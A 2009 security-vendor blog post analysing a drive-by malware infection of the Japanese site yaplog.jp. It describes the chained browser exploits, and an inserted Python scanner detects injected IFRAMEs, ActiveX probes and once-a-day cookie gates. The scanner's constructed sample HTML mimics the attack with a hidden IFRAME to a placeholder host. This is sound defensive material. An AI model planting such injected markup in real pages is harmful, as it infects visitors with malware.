MCRC Blog - 2009

Feb 24, 2009

Malware and the rising sun website

We at Finjan always claim that malware has no boundaries, and national borders will not prevent cybercriminals from infecting websites with their malware. To demonstrate, let us take a closer look at the following site, which is ranked 41 in Japan (!) and 382 worldwide according to Alexa: yaplog.jp

As you can guess, this website was compromised and was found serving malware. Let’s look at this attack in detail.

First and foremost, an HTML IFRAME element was injected into one of the pages of yaplog.jp:

The embedded IFRAME on this Japanese site points to an external web page hosted in China, one that we at MCRC have been familiar with since July last year. Old as it may be, it is still effective at infecting unsuspecting visitors, especially those running an outdated operating system.

The first thing the malicious page does is create an MDAC ActiveX object instance, which in turn creates a new XMLHTTP object instance. If this creation succeeds, the browser in use is a vulnerable (unpatched) IE, so another page is included. The new page uses the MDAC vulnerability to push a Trojan to the client and execute it.

This is the MDAC check:

The included page is moderately obfuscated to reduce its chances of being caught by signature-based scans, such as those of anti-virus products.

Had the MDAC check failed, other vulnerabilities would have been exploited, each in a new IFRAME that includes an obfuscated page. First comes IE’s VML renderer, which had a buffer overflow that was simple to exploit in order to execute malicious code on the client machine. This is followed by the latest, and much talked about, IE data-binding vulnerability, which also enables the execution of malicious code. This exploit was added only recently and is known to be highly effective, as many browsers have not been patched yet.

Next are attempts to abuse the previously vulnerable ANI (animated cursor) file type by instructing the browser to use a malicious ANI file as the mouse cursor.

Last, but not least, an attempt is made to exploit a Yahoo! Messenger vulnerability. This is another buffer overflow that allows remote code execution.

Below is the code responsible for all of the exploits described above:

All of these exploits serve the same purpose: pushing a downloader Trojan to the client. Once that Trojan executes, it pulls a second Trojan, which is capable of stealing user data.

To make the attack harder to track, it uses a cookie as a client-side mechanism, ensuring that the malicious pages are executed only once a day and no more.
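The three client-side indicators this post describes (an injected IFRAME pointing at a foreign host, an ActiveX object that in turn creates an XMLHTTP object as the MDAC check does, and a cookie gate that limits execution to once a day) can be triaged statically from a saved copy of a page. The following scanner is an added example written for this post; it is not Finjan's or MCRC's code, and the HTML it scans is constructed: the host name `example-bad.invalid` and the ProgID `Placeholder.Object` are placeholders, not the values from the real attack.

```python
"""Static triage of a saved HTML page for the three indicators this post
describes: an injected IFRAME pointing to a foreign host, an MDAC-style
ActiveX probe that obtains an XMLHTTP object through a first ActiveX object,
and a cookie gate that runs the malicious code only once per day.

Added example, not Finjan's code. The HTML below is constructed; the host
name and the ActiveX ProgID in it are placeholders, not the real ones."""
import re
from urllib.parse import urlparse

# Constructed sample page; "example-bad.invalid" and "Placeholder.Object"
# stand in for the real host and ProgID, which this example does not know.
SAMPLE_HTML = """
<html><body><h1>Diary</h1>
<script>
var n = "seen";
if (document.cookie.indexOf(n + "=") == -1) {
  var d = new Date(); d.setTime(d.getTime() + 24*60*60*1000);
  document.cookie = n + "=1; expires=" + d.toGMTString();
  document.write('<iframe src="http://example-bad.invalid/in.html" width=0 height=0></iframe>');
}
</script>
<iframe src="http://example-bad.invalid/in.html" width="0" height="0"></iframe>
<script>
try {
  var o = new ActiveXObject("Placeholder.Object");
  var x = o.CreateObject("Microsoft.XMLHTTP", "");
  document.write('<iframe src="/stage2.html"></iframe>');
} catch (e) {}
</script>
</body></html>
"""

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
IFRAME_TAG_RE = re.compile(r"<iframe\b[^>]*>", re.I)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)
HIDDEN_RE = re.compile(r"""\b(?:width|height)\s*=\s*["']?0\b""", re.I)
# One ActiveX object creating an XMLHTTP object via CreateObject, the shape of
# the MDAC check the post describes. A plain new ActiveXObject("Microsoft.XMLHTTP")
# is ordinary AJAX of that era and is deliberately not flagged.
PROBE_RE = re.compile(
    r"""new\s+ActiveXObject\s*\([^)]*\)[\s\S]{0,400}?\.CreateObject\s*\(\s*["']Microsoft\.XMLHTTP""",
    re.I)
COOKIE_READ_RE = re.compile(r"document\.cookie\s*(?:\.|==|!=|\))")
COOKIE_WRITE_RE = re.compile(r"document\.cookie\s*=(?!=)")
WRITE_IFRAME_RE = re.compile(r"document\.write\s*\([^)]*<iframe", re.I)


def scripts(html):
    """Return the bodies of all inline <script> blocks, in page order."""
    return [m.group(1) for m in SCRIPT_RE.finditer(html)]


def find_foreign_iframes(html, site_host):
    """IFRAMEs (in markup or inside document.write strings) whose host is not
    the site itself. Returns sorted (src, hidden) pairs; hidden means the tag
    sets a zero width or height, the usual way an injected frame is concealed."""
    found = {}
    site_host = site_host.lower()
    for m in IFRAME_TAG_RE.finditer(html):
        tag = m.group(0)
        src_match = SRC_RE.search(tag)
        if not src_match:
            continue
        src = src_match.group(1)
        host = (urlparse(src).hostname or site_host).lower()  # relative src: same site
        if host == site_host or host.endswith("." + site_host):
            continue
        found[src] = found.get(src, False) or bool(HIDDEN_RE.search(tag))
    return sorted(found.items())


def find_activex_probes(html):
    """Indices of script blocks containing the two-stage ActiveX probe."""
    return [i for i, s in enumerate(scripts(html)) if PROBE_RE.search(s)]


def find_cookie_gates(html):
    """Indices of script blocks that read a cookie, set one, and write an
    IFRAME: the once-per-period gate the post describes."""
    return [i for i, s in enumerate(scripts(html))
            if COOKIE_READ_RE.search(s) and COOKIE_WRITE_RE.search(s)
            and WRITE_IFRAME_RE.search(s)]


def triage(html, site_host):
    """Collect all three indicators for one page."""
    return {
        "foreign_iframes": find_foreign_iframes(html, site_host),
        "activex_probe_scripts": find_activex_probes(html),
        "cookie_gate_scripts": find_cookie_gates(html),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_HTML, "yaplog.jp").items():
        print(f"{key}: {value}")
```

Run it against a page saved with the browser, or with a fetch that presents an IE user agent, since the cookie gate means a second request from the same client will show a clean page. The regex heuristics only cover unobfuscated JavaScript; the obfuscated second-stage pages the post mentions would need to be deobfuscated first, so treat this as a first-pass check for the injection point rather than a full analysis.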

We are happy to report that yaplog.jp removed the malicious code from their website.

Posted by Moshe Basanchig

